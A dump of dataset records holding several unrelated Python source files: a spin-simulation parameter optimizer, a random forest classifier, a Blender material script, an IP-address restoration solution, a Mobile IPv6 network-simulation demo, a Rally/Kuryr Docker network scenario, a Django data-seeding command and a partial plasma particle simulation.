3.1) and (2.9817*(1+1E-2*(x1[0]-1.0)) > 2.9) : \n #Sxnm=np.mean(Sxn, axis=0);\n Sznm=np.mean(Szn, axis=0);#Szn[0][1000]##np.mean(Szn, axis=0);\n #Sznm=np.mean(Szn, axis=0);\n #Sx3m=np.mean(Sx3, axis=0);\n Sz3m=np.mean(Sz3, axis=0);#Sz3[0][1000]#np.mean(Szn, axis=0);#np.mean(Sz3, axis=0);\n tsimm=np.mean(tsim, axis=0);\n #Sz3m=np.mean(Sz3, axis=0);\n #Sz32=np.multiply(Sz3m,Sz3m)\n #Sy32=np.multiply(Sy3m,Sy3m) \n #Sx32=np.multiply(Sx3m,Sx3m)\n #S32p=np.add(Sz32,Sy32)\n #S32=np.add(S32p,Sx32)\n Sznp=np.square(np.mean(Sznm)-1.);#np.square(np.mean(Sznm)-1.);\n Sz3p=np.square(np.mean(Sz3m)-1.);#np.square(np.mean(Sz3m)-1.);\n #print \"Sz3= \"+str(Sz3p)+\", Szn= \"+str(Sznp)+\"\\n\";\n #Szn2=np.multiply(Sznm,Sznm)\n #Syn2=np.multiply(Synm,Synm) \n #Sxn2=np.multiply(Sxnm,Sxnm)\n #Sn2p=np.add(Szn2,Syn2)\n #Sn2=np.add(Sn2p,Sxn2)\n #Sx2=np.abs(Sxn-Sx3);\n #Sy2=np.abs(Syn-Sy3);\n #Sz2=np.abs(Szn-Sz3);\n #S2=np.add(Sznp,Sz3p);\n \n #Sxp=np.subtract(Sxn,Sx3);\n #Syp=np.subtract(Syn,Sy3);\n #Szp=np.subtract(Szn,Sz3);\n #Sx2=np.mean(np.abs(Sxp));\n #Sy2=np.mean(np.abs(Syp));\n #Sz2=np.mean(np.abs(Szp));\n\n\n S2=Sznp+Sz3p;\n #print \"dsx2 = \" + str(Sx2)+ \" dsy2 = \"+str(Sy2)+\" dsz2 = \"+str(Sz2)+\"\\n\";\n print(\"time \" + str(tsimm[run.parameters.nBins]) +\" x \"+str(x1[0])+\" \"+str(x1[1])+\" \"+str(x1[2])+\" \"+str(x1[3])+\" \"+str(x1[4])+\" \"+\"\\n szn = \" + str(np.mean(Sznm))+ \" sz3 = \"+str(np.mean(Sz3m))+\"\\n\");\n #S2 is sigma n cdot sigma 3. THis should be maximized. thus 1-mean(S2) is minimized. \n #calculating the combined polarization for both neutron and helium3 (this is the maximum signal if a modulation phase is applied).\n \n \n #print str(np.size(S));\n \n #def minExp(x,S):\n # tfit=np.linspace((run.parameters.nBins-1499)*10.1/2000, 10.1, num=1500)\n # out1=x[0]*np.exp(-x[1]*tfit);\n # return np.mean(np.square(np.subtract(out1,S)));\n\n\n\n #x0=np.array([0.924,1E-4]);\n\n #res = minimize(minExp, x0, S, method='nelder-mead', options={'xtol': 1e-5, 'disp': True})\n #Sout=2-np.mean(S2);\n print(\"returning value=\" +str(S2)+\"\\n\")\n \n return S2;\n else:\n print(\"\\n\");\n print(\"x1 = \"+str(x1[0])+\" is out of Robust dressing range\\n\");\n print(\"returning \"+str(np.abs(x1[0]))+\"\\n\");\n return np.abs(x1[0]);\n\n##################################### Final Loop\ndef final_loop(x1,run):\n \n print(\"Starting run %d...\" % (run.runID,))\n run.nCurrent=0;\n while run.nCurrent < run.parameters.nEntries:\n rn=run.nCurrent\n rnf=run.nCurrent*1.0000\n norsf=run.parameters.nEntries*1.0000;\n if rn >=0: #careful. \n run.parameters.simType=rn%2\n if rn%2==0:\n run.parameters.seed=82*(rn+1)\n #run.parameters.seed=82*(rn+1) \n #4.02497057364e-05; best critically dressed for 5.2 uT. 103 Hz. 8 significant digits.\n #Best for robust dressing at 5.2 uT 200 Hz mod, B1=4.205e-5; modulation amplitude = 3.497!. \n #Best for robust dressing at 5.2 uT 300 Hz mod, B1=4.42958e-5; modulation amplitude = 3.32973!. \n #best for robust dresssing at 5.2 uT 550Hz mod, B1=5.3491388e-05; mod amp= 2.591036\n\n #best for rcd 5.2 uT 200Hz mod CONSTANT POWER amp= 0.074262070170000, B1=5.22583821E-5\n\n B1=4.205e-5*(1+1E-2*(x1[1]-1.0));#5.3491388e-05#4.205e-5#5.3491388E-5#4.205e-5#5.347e-05*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#4.02444353976e-05*(1+1E-4*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#0.000250021223525*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#\n #print \"Bz1 = \"+str(B1)+\"\\n\"\n run.EraseFieldFormula();\n run.parameters.field_assignment(\"BzAdd\",str(B1))\n \n \n run.parameters.SDparam[4]=0.1*(1+1E-2*(x1[0]-1.0));#3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #print \"x1 = \"+str(run.parameters.SDparam[4])+\"\\n\"\n #print \"Mod amp = \"+str(run.parameters.SDparam[4]*B1/3.57E-5)+\"\\n\"\n #6 7 Bz1 = 4.1915874e-05\n\n #\n #run.parameters.Pulseparam[3]=1.245#*(1+.05*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))\n #run.parameters.Pulseparam[2]=0.708#*(1+0.1*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#7 is noise rng seed. \n #Neutrons:\n #3845.309408, 6283.18530718\n #\n #phase=0;#np.pi/4;#np.pi/2;#np.pi/4.0;\n #phi=np.pi/8;\n\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=1E-23 this is e meters. (ugghhh)\n #run.parameters.edm=0\n #run.parameters.speed=5\n #if rn%4==0:\n #run.parameters.SDparam[2]=np.pi*(rnf/norsf)\n #run.parameters.SDparam[2]=0.0;\n \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed.\n #print \"B1phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #run.parameters.Pulseparam[1]=(rn//2+2) \n #offset in another cell, \n \n else:\n #3He:\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.#np.sin(phi+phase)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)\n #run.parameters.edm=0\n #run.parameters.E\n #print \"phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #7 is noise rng seed. \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed. \n #678742112 #seed is trajectory rng. \n run.ReloadParameters();\n \n ret = run.runNeutron()\n\n\n\n if ret == 0:\n sys.stdout.write(str(rn)+' ')\n sys.stdout.flush()\n else:\n print(\"discarded one neutron\")\n \n print(\"\\n\");\n\n\n\n\n\n\nif __name__ == '__main__':\n try:\n opts, args = getopt.gnu_getopt(sys.argv[1:], 'cp:n:', ['novc', 'numerical='])\n except getopt.GetoptError as e:\n print(e)\n sys.exit(1)\n opts = dict(opts)\n try:\n run_id = int(args[0])\n except IndexError:\n print(\"Please enter run ID\")\n sys.exit(1)\n except ValueError:\n print(\"Please enter valid integer run ID\")\n sys.exit(1)\n\n try:\n run = create_run(run_id, opts)\n except Exception as e:\n print(\"There was an error creating the run\")\n print(e)\n sys.exit(1)\n\n try:\n \n \n x0=np.array([1, 1, 1, 1, 1]);\n\n #x0[0]= 25.7586780717, x0[1]= 1.95572926907, x0[2]= -15.2864911055, x0[3]= -0.904600550417, x0[4]= -0.735150581578\n #x0=np.array([25.7586780717, 1.95572926907,-15.2864911055, -0.904600550417, 0.735150581578]);\n \n #x0=np.array([.95]);\n #def pmin(x1,x2):\n #return (x1-x2)*(x1-x2);\n #x2=1;\n \n def min(x1):\n #del run\n #os.system(\"rm run\"+str(run_id)+\".root\")\n #run = create_run(run_id, opts);\n P1m = single_loop(x1,run);\n return P1m;\n \n #minimize the parameter(s)\n res = minimize(min, x0, method='nelder-mead', options={'xtol': 1e-7, 'disp': True, 'maxiter': 10000, 'maxfev': 10000})\n x0=res.x;\n\n #print \"Optimized x1 = \"+ str(res.x)+\"\\n\"\n print(\"Saving Optimized Results\")\n #print \"Running Final Optimization\"\n \n #final_loop(x0,run);\n optname = \"x1optimized_ConstPow_\"+str(run_id); # optimized value file name\n optd = \"/data1/cmswank/spin-sim-xliu/DataSaved/opt/\" #optimized x1 value directory\n \n #B1=4.205e-5*(1+1E-2*(x0[1]-1.0));\n \n #x1=2.9817*(1+1E-2*(x0[0]-1.0));\n\n\n with open(optd+optname,'w') as foundx1:\n foundx1.writelines(str(x0[0])+\" , \"+str(x0[1])+\" , \"+str(x0[2])+\" , \"+str(x0[3])+\" , \" +str(x0[4]));\n \n \n \n except KeyboardInterrupt:\n print(\"^C caught. Letting file finish saving...\")\n else:\n print(\"\\ndone\")\n finally:\n run.WriteTFile()\n print(\"exiting..\")\n del run\n\n sys.exit(0)\n","sub_path":"run_optimize.py","file_name":"run_optimize.py","file_ext":"py","file_size_in_byte":20595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582863189","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\nfrom collections import Counter\nfrom sklearn import datasets\nfrom sklearn.datasets import make_moons\nfrom sklearn.linear_model.logistic import LogisticRegression\nimport matplotlib.pyplot as plt\nimport mglearn\n \nclass RandomForest:\n def __init__(self, k=1, t=10):\n self.k = k # 每次随机选取k个特征,从中选择最优特征和特征值\n self.T = t # 决策树的数量\n self.validData = {} # 存储每颗树未使用的样本索引\n self.accuracy = 0 # 初始化包外数据准确率\n \n @staticmethod\n def cal_gini(dataset):\n \"\"\"计算基尼指数\"\"\"\n gini = 1\n labels = Counter(dataset[:, -1].tolist())\n for amount in labels.values():\n prob = amount / dataset.shape[0]\n gini -= np.power(prob, 2)\n return gini\n \n @staticmethod\n def split_dataset(dataset, feature, value):\n \"\"\"分离数据集.指针对离散型数据集\"\"\"\n left = dataset[np.nonzero(dataset[:, feature] == value)[0], :]\n right = dataset[np.nonzero(dataset[:, feature] != value)[0], :]\n return left, right\n \n @staticmethod\n def choose_dataset(dataset):\n \"\"\"从原始训练集中,使用自助采样法获取训练集,与未被选上的样本索引(作为包外验证集)\"\"\"\n m = dataset.shape[0]\n choosed_feature = np.random.choice(m, m)\n unchoosed_feature = set(range(m)) - set(choosed_feature.tolist())\n train_data = dataset[choosed_feature, :]\n return train_data, unchoosed_feature \n \n def choose_best_feature(self, dataset):\n \"\"\"从k个特征中选择最优特征和特征值\"\"\"\n best_feature, min_gini, best_value, split_gini = -1, np.inf, 0, 0 # 定义各种变量\n n = dataset.shape[1] - 1 # 特征数\n rand_feature = np.random.choice(n, self.k, replace=False) # 从range(n)中选择k个不重复的值\n for feature in rand_feature: # 遍历每个特征的每个特征值\n values = np.unique(dataset[:, feature])\n for value in values:\n left, right = self.split_dataset(dataset, feature, value)\n split_gini = left.shape[0] / dataset.shape[0] * self.cal_gini(left) + right.shape[0] / \\\n dataset.shape[0] * self.cal_gini(right)\n if split_gini < min_gini:\n min_gini = split_gini\n best_feature = feature\n best_value = value\n return best_feature, best_value\n \n def create_tree(self, dataset):\n \"\"\"创建CART分类树\"\"\"\n if dataset.shape[0] == 0: # 如果数据集为空,返回空\n return\n if np.unique(dataset[:, -1]).shape[0] == 1: \n return dataset[0, -1]\n best_feature, best_value = self.choose_best_feature(dataset)\n tree = dict()\n tree['Feature'] = best_feature\n tree['Value'] = best_value\n left, right = self.split_dataset(dataset, best_feature, best_value)\n tree['left'] = self.create_tree(left)\n tree['right'] = self.create_tree(right)\n return tree\n \n def predict_bytree(self, tree, test_data): # 返回单棵决策树预测的结果\n if not isinstance(tree, dict): \n return tree\n feature = tree['Feature']\n value = tree['Value']\n if test_data[feature] == value:\n return self.predict_bytree(tree['left'], test_data)\n else: \n return self.predict_bytree(tree['right'], test_data)\n \n def training(self, dataset):\n \"\"\"训练生成T棵决策树,组成随机森林\"\"\"\n dataset = np.array(dataset)\n rand_forest = []\n \n for i in range(self.T):\n train_data, unchoosed_feature = self.choose_dataset(dataset)\n tree = self.create_tree(train_data)\n rand_forest.append(tree)\n self.validData[i] = unchoosed_feature # 记录各树未使用的样本\n \n # 以下计算包外数据的准确率\n totol_count = count = 0 # 分别记录预测数,和预测正确的个数\n for i, test_data in enumerate(dataset[:, : -1]):\n temp = []\n for tree_index, validData in self.validData.items():\n if i in validData: # 如果i样本未被tree_index使用,则计算它的预测值\n temp.append(self.predict_bytree(rand_forest[tree_index], test_data))\n if temp:\n totol_count += 1\n if Counter(temp).most_common(1)[0][0] == dataset[i, -1]: # 投票法获取预测结果\n count += 1 \n self.accuracy = count / totol_count # 更新包外数据准确率\n \n return rand_forest\n \n def predict(self, rand_forest, test_data):\n \"\"\"使用随机森林预测\"\"\"\n test_data = np.array(test_data)\n prediction = []\n for data in test_data:\n temp = []\n if isinstance(data, np.ndarray): # 判断test_data是二维还是一维的\n for tree in rand_forest:\n temp.append(self.predict_bytree(tree, data))\n prediction.append(Counter(temp).most_common(1)[0][0])\n else:\n for tree in rand_forest:\n temp.append(self.predict_bytree(tree, test_data))\n prediction.append(Counter(temp).most_common(1)[0][0])\n break\n return prediction\n \n \ndef test():\n \"\"\"使用鸢尾花数据集测试\"\"\"\n data = datasets.load_iris()\n print(data)\n features = data['data']\n target = data['target'].reshape(150, 1)\n data = np.concatenate((features, target), axis=1)\n np.random.shuffle(data) # 打乱数据\n features = data[:, : -1]\n target = data[:, -1]\n print(data)\n rf = RandomForest(k=3, t=10)#初始化随机森林\n forest = rf.training(data)# 训练\n print(rf)\n print(rf.accuracy) # 检查包外数据准确率\n prediction = rf.predict(forest, features)\n correct = [1 if a == b else 0 for a, b in zip(prediction, target)]\n print(correct.count(1) / 150) # 训练数据准确率\n \n \ntest()\n","sub_path":"RandomForsest/Drawing/RandomForest/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"641834503","text":"# material creation code goes here\n\nimport bpy\n\nimport read_material\nimport read_texture\n\ndef create_material(name, material_fpath, texture_fpath):\n material_file = read_material.MTL()\n material_file.load_material(material_fpath + '\\\\' + name)\n \n material = bpy.data.materials.new(material_file.materialname)\n material.use_nodes = True\n\n nodes = material.node_tree.nodes\n links = material.node_tree.links\n\n # delete all nodes except output node\n for node in [node for node in nodes if node.type != 'OUTPUT_MATERIAL']:\n nodes.remove(node)\n\n # get output node\n material_output_node = None\n try:\n material_output_node = [node for node in nodes if node.type == 'OUTPUT_MATERIAL'][0]\n except:\n material_output_node = nodes.new('ShaderNodeOutputMaterial')\n material_output_node.location = (100,0)\n\n # create principled bsdf node\n principled_bsdf_node = nodes.new('ShaderNodeBsdfPrincipled')\n principled_bsdf_node.location = (-200,0)\n principled_bsdf_node.width = 200\n\n # create texture input nodes\n counter = 0\n for maptype, mapname in material_file.mapinfo.items():\n texture = read_texture.Texture()\n if(texture.load_texture(texture_fpath + '\\\\' + mapname + '.iwi')):\n texture_image = bpy.data.images.new(mapname, texture.width, texture.height)\n pixels = [x / 255 for x in texture.texture_data]\n texture_image.pixels = pixels\n\n texture_node = nodes.new('ShaderNodeTexImage')\n texture_node.label = maptype\n texture_node.location = (-700, 0 - 250 * counter)\n texture_node.image = texture_image\n\n counter += 1\n\n # create normalmap node\n normal_node = nodes.new('ShaderNodeNormalMap')\n normal_node.location = (-450, -500)\n\n # create texture coordinate node\n textcoord_node = nodes.new('ShaderNodeTexCoord')\n textcoord_node.location = (-1000, -150)\n\n \n\n \"\"\"\n material = bpy.data.materials.new(material_file.materialname)\n material.use_nodes = True\n\n nodes = material.node_tree.nodes\n links = material.node_tree.links\n\n for node in [node for node in nodes if node.type != 'OUTPUT_MATERIAL']:\n nodes.remove(node)\n \n material_output_node = None\n try:\n material_output_node = [node for node in nodes if node.type == 'OUTPUT_MATERIAL'][0]\n except:\n material_output_node = nodes.new('ShaderNodeOutputMaterial')\n material_output_node.location = (100, 0)\n\n principled_bsdf_node = nodes.new('ShaderNodeBsdfPrincipled')\n principled_bsdf_node.location = (-200,0)\n principled_bsdf_node.width = 200\n\n #colormap \n colormap_node = nodes.new('ShaderNodeTexImage')\n colormap_node.location = (-700, 0)\n colormap_node.label = 'COLORMAP'\n\n #specularmap \n specularmap_node = nodes.new('ShaderNodeTexImage')\n specularmap_node.location = (-700, -250)\n specularmap_node.label = 'SPECULARMAP'\n\n #normalmap \n normalmap_node = nodes.new('ShaderNodeTexImage')\n normalmap_node.location = (-700, -500)\n normalmap_node.label = 'NORMALMAP'\n\n normal_node = nodes.new('ShaderNodeNormalMap')\n normal_node.location = (-450, -500)\n\n #textcoord\n textcoord_node = nodes.new('ShaderNodeTexCoord')\n textcoord_node.location = (-1000, -150)\n\n links.new(textcoord_node.outputs['UV'], colormap_node.inputs['Vector'])\n links.new(textcoord_node.outputs['UV'], specularmap_node.inputs['Vector'])\n links.new(textcoord_node.outputs['UV'], normalmap_node.inputs['Vector'])\n\n links.new(colormap_node.outputs['Color'], principled_bsdf_node.inputs['Base Color'])\n links.new(specularmap_node.outputs['Color'], principled_bsdf_node.inputs['Specular'])\n links.new(normalmap_node.outputs['Color'], normal_node.inputs['Color'])\n links.new(normal_node.outputs['Normal'], principled_bsdf_node.inputs['Normal'])\n\n links.new(principled_bsdf_node.outputs['BSDF'], material_output_node.inputs['Surface'])\n \"\"\"\n# testing\ncreate_material('toujane_ground1', 'F:\\\\MOVIEMAKING\\\\3D STUFF\\\\COD\\\\COD2ASSETS\\\\materials', 'F:\\\\MOVIEMAKING\\\\3D STUFF\\\\COD\\\\COD2ASSETS\\\\images')","sub_path":"pyd3dbsp/create_material.py","file_name":"create_material.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588399109","text":"class Solution(object):\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n if len(s) < 4 or len(s) > 12:\n return []\n\n res = []\n\n def meet(s):\n if s == \"\" or len(s) > 3 or (len(s) != 1 and s[0] == \"0\") or int(s) > 255:\n return False\n return True\n\n ## 因为最多只有12位数字,使用三层循环即可,时间复杂度也不会很高\n for i in range(1, len(s) - 2):\n ip1 = s[: i]\n if not meet(ip1):\n break\n for j in range(i + 1, len(s) - 1):\n ip2 = s[i: j]\n if not meet(ip2):\n break\n for k in range(j + 1, len(s)):\n ip3 = s[j: k]\n if not meet(ip3):\n break\n if meet(s[k:]):\n ip = ip1 + \".\" + ip2 + \".\" + ip3 + \".\" + s[k:]\n res.append(ip)\n\n return res\n\nif __name__ == '__main__':\n\ts = \"25525511135\"\n\tres = Solution().restoreIpAddresses(s)\n\tprint(res)","sub_path":"leetcode/51-100/_93_restoreIpAddresses.py","file_name":"_93_restoreIpAddresses.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"165733564","text":"#!python\nimport random\n\nrandom.seed(0)\nN_anps = 2089\n\nanps_fl = open('./classes.txt', 'r')\nanps = anps_fl.readlines()\nanps_fl.close()\n\nf = open('test' + str(N_anps) + '_negset.txt','w')\n\nfor i in range(0, N_anps):\n anp = anps[i].strip()\n testset = ''\n for j in range(0, N_anps):\n if j == i:\n testset = testset + ' ' + str(0)\n continue\n\n testset = testset + ' ' + str(random.randint(1, 20))\n\n #f.write(anp + ' ' + testset + '\\n')\n f.write(testset + '\\n')\n\nf.close()","sub_path":"gen_testnegset.py","file_name":"gen_testnegset.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"349490839","text":"import os\nfrom netpylab import World\nfrom places import *\nfrom paths import *\nfrom nodes import *\nfrom interfaces import *\nfrom applications import *\nfrom channels import *\nfrom report import Report\nfrom layers.ipv6 import mac2linklocal\n\nworld = World()\n\nt = GpxPath('../gpx/rennes1.gpx', 'Rennes1')\nc = Car(world, t, label='c')\na = Anchor(world, 48.113205, -1.649238, label='a')\nb1 = Building(world, 48.120205, -1.644238, label='b1')\nb2 = Building(world, 48.122205, -1.644238, label='b2')\nb3 = Building(world, 48.122205, -1.643238, label='b3')\n\nc.start(at=0)\nmn = MobileNode(c, HoA = '2009::1', HA_addr = '2009::100', home_prefix = '2009::', prefix_len =64, label ='mn')\nar = IPRouter(b1, 'ar')\nha = HomeAgent(b2, '2009::100', '2009::', 64, 'ha')\ncn = IPNode(b2, 'cn')\n\nmn_i1 = EthernetInterface(mn, 'mn_i1')\n\nar_i1 = EthernetInterface(ar, 'ar_i1')\nar_i2 = EthernetInterface(ar, 'ar_i2')\n\nha_i1 = EthernetInterface(ha, 'ha_i1')\nha_i2 = EthernetInterface(ha, 'ha_i2')\n\ncn_i1 = EthernetInterface(cn, 'cn_i1')\n\n\nar_i1.ipv6.icmpv6.set_prefix_list([('2000::',64)])\nar_i2.ipv6.icmpv6.set_prefix_list([('2001::',64)])\n\n\n\nha_i1.ipv6.manual_addresses=['2001::100']\nha_i1.ipv6.icmpv6.set_prefix_list([('2001::',64)])\nha_i2.ipv6.manual_addresses=['2002::100']\nha_i2.ipv6.icmpv6.set_prefix_list([('2002::',64)])\n\ncn_i1.ipv6.manual_addresses=['2002::1']\n\nha_i1_addr = mac2linklocal(ha_i1.mac)\nar_i2.ipv6.manual_route_add('::', ar_i2, 0, next_hop = ha_i1_addr)\n\nar_i2_addr = mac2linklocal(ar_i2.mac)\nha_i1.ipv6.manual_route_add('::', ha_i1, 0, next_hop = ar_i2_addr)\n\ncable1 = EthernetCable(world)\ncable2 = EthernetCable(world)\ncable3 = EthernetCable(world)\n\nmn_i1.connect(cable1)\nar_i1.connect(cable1)\n\nar_i2.connect(cable2)\nha_i1.connect(cable2)\n\nha_i2.connect(cable3)\ncn_i1.connect(cable3)\n\nwf = WhiteFountain(mn, '2002::1', None, 'wf')\nam = AnsweringMachine(cn, 'am')\n\nmn.start()\nar.start()\nha.start()\ncn.start()\n\nif world.gui:\n world.gui.target_obj = c\n world.gui.add_label(wf.info)\n world.gui.add_label(am.info)\n world.gui.map.zoom = 15\n\n########################\nworld.start()\n########################\n# print 'Producing Report ... '\n# world.sequence_diagram([(wf, mn, mn_i1), (ar_i1, ar, ar_i2), (ha_i1, ha, ha_i2, ha.loopback),(cn_i1, cn, am)], '/tmp/packets.pdf')\n# os.system(\"open /tmp/packets.pdf\")\n","sub_path":"demo_scripts/MobileIPv6_Ethernet.py","file_name":"MobileIPv6_Ethernet.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646757354","text":"import pymysql\nfrom random import randrange\nimport time\n\nclass InDataToMysql(object):\n def __init__(self, inDataDic):\n self.userId = inDataDic['conType']\n self.conn = None\n self.connDb()\n self.inSertTouser()\n self.connEnd()\n\n def connDb(self):\n self.conn = pymysql.connect(host='192.168.75.129', user='root', password='123456',\n database='vmMonitor',\n port=3306, charset='utf8')\n\n def inSertTouser(self):\n sql = \"select coincnname from atop_vm_data\"\n cursor = self.conn.cursor()\n reVar = cursor.execute(sql)\n\n def connEnd(self):\n self.conn.commit()\n self.conn.close()","sub_path":"vmMarket/intoDb.py","file_name":"intoDb.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443731604","text":"from ...models import *\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n Shop.objects.all().delete()\n Department.objects.all().delete()\n Item.objects.all().delete()\n shop_1 = Shop.objects.create(\n name='Auchan',\n staff_amount=250)\n shop_2 = Shop.objects.create(\n name='IKEA',\n address='Street Žirnių g. 56, Vilnius, Lithuania',\n staff_amount=500\n )\n departament_1 = Department.objects.create(\n sphere='Furniture',\n description='Some rich furniture',\n staff_amount=250,\n shop=shop_1\n )\n departament_2 = Department.objects.create(\n sphere='Furniture',\n description='Some furniture',\n staff_amount=300,\n shop=shop_2\n )\n departament_3 = Department.objects.create(\n sphere='Dishes',\n description='Some plates, cups',\n staff_amount=200,\n shop=shop_2\n )\n Item.objects.create(\n name='Table',\n description='Cheap wooden table',\n price=300,\n department=departament_1\n )\n Item.objects.create(\n name='Table',\n price=750,\n department=departament_2\n )\n Item.objects.create(\n name='Bed',\n description='Amazing wooden bed',\n price=1200,\n department=departament_2\n )\n Item.objects.create(\n name='Cup',\n price=10,\n department=departament_3\n )\n Item.objects.create(\n name='Plate',\n description='Glass plate',\n price=20,\n department=departament_3)\n","sub_path":"werded/management/commands/insert_data.py","file_name":"insert_data.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510422716","text":"# Copyright 2016: IBM Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport docker\n\nfrom rally.common import logging\nfrom rally.plugins.openstack import scenario\nfrom rally.task import atomic\n\nLOG = logging.getLogger(__name__)\n\n\nclass KuryrScenario(scenario.OpenStackScenario):\n \"\"\"Base class for Kuryr scenarios with basic atomic actions.\"\"\"\n\n def __init__(self, context=None, admin_clients=None, clients=None):\n super(KuryrScenario, self).__init__(context, admin_clients, clients)\n self.docker_client = docker.Client(base_url='tcp://0.0.0.0:2375')\n\n @atomic.action_timer(\"kuryr.list_networks\")\n def _list_networks(self, network_list_args):\n \"\"\"Return user networks list.\n\n :param network_list_args: network list options\n \"\"\"\n LOG.debug(\"Running the list_networks scenario\")\n names = network_list_args.get('names')\n ids = network_list_args.get('ids')\n return self.docker_client.networks(names, ids)\n\n @atomic.action_timer(\"kuryr.create_network\")\n def _create_network(self, network_create_args):\n \"\"\"Create Kuryr network.\n\n :param network_create_args: dict: name, driver and others\n :returns: dict of the created network reference object\n \"\"\"\n name = self.generate_random_name()\n return self.docker_client.create_network(name=name,\n driver='kuryr',\n options=network_create_args\n )\n\n @atomic.action_timer(\"kuryr.delete_network\")\n def _delete_network(self, network):\n \"\"\"Delete Kuryr network.\n\n :param network: Network object\n \"\"\"\n self.docker_client.remove_network(network['Id'])\n","sub_path":"rally-jobs/plugins/scenarios/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"144143469","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 25 20:30:31 2019\r\n\r\n@author: tacon\r\n\"\"\"\r\n\r\nwidth = 1E-4\r\nheight = 1E-4\r\n\r\nne, ni = 400, 400\r\nTe = 1E4 #k\r\nTi = Te/1000 #k\r\nq = 1.602176634E-19\r\nme = 9.10938356E-31\r\nmi = 131.293 * 1.66054E-27\r\nkb = 1.38064852E-23\r\nep0 = 8.8541878128E-12\r\nke = 8.9875517873681764E9\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\ndef setup(ne, ni):\r\n PDB = np.zeros((ne+ni,8))\r\n vthe = np.sqrt((3*kb*Te)/me)\r\n vthi = np.sqrt((3*kb*Ti)/mi)\r\n alpha = np.random.uniform(0, 2*np.pi, (ne + ni))\r\n PDB[: ,0] = np.random.uniform(0, width ,((ne + ni)))\r\n PDB[: ,1] = np.random.uniform(0, height,((ne + ni)))\r\n PDB[:ne,2] = vthe * np.cos(alpha[:ne])\r\n PDB[:ne,3] = vthe * np.sin(alpha[:ne])\r\n PDB[ne:,2] = vthi * np.cos(alpha[:ne])\r\n PDB[ne:,3] = vthi * np.sin(alpha[:ne])\r\n PDB[:ne,6] = -q\r\n PDB[ne:,6] = q\r\n PDB[:ne,7] = me\r\n PDB[ne:,7] = mi\r\n return PDB\r\n\r\nPDB = setup(ne, ni)\r\n\r\ndef timeStep(stepSize):\r\n PDB[:,2:4] += PDB[:,4:6] * stepSize\r\n PDB[:,0:2] += PDB[:,2:4] * stepSize\r\n PDB[:,2] = np.where(PDB[:,0] > width, -1 * PDB[:,2], PDB[:,2])\r\n PDB[:,3] = np.where(PDB[:,1] > height, -1 * PDB[:,3], PDB[:,3])\r\n PDB[:,2] = np.where(PDB[:,0] < 0, -1 * PDB[:,2], PDB[:,2])\r\n PDB[:,3] = np.where(PDB[:,1] < 0, -1 * PDB[:,3], PDB[:,3])\r\n return PDB\r\n\r\ndef forceFinder():\r\n accels = np.zeros((ne+ni,2))\r\n for number, particle in enumerate(PDB):\r\n calculations = np.zeros((ne+ni,9))\r\n x0 = np.full((ne+ni, 1), particle[0])\r\n y0 = np.full((ne+ni, 1), particle[1])\r\n q0 = np.full((ne+ni, 1), particle[-2])\r\n calculations[:,0] = np.subtract(x0[:,0], PDB[:,0])\r\n calculations[:,1] = np.subtract(y0[:,0], PDB[:,1])\r\n calculations[number,0:2] = np.array((1e5, 1e5))\r\n calculations[:,2] = np.add(np.power(calculations[:,0],2), np.power(calculations[:,1],2))\r\n calculations[:,3] = np.power(calculations[:,2],0.5)\r\n calculations[:,4] = np.divide(calculations[:,0], calculations[:,3])\r\n calculations[:,5] = np.divide(calculations[:,1], calculations[:,3])\r\n 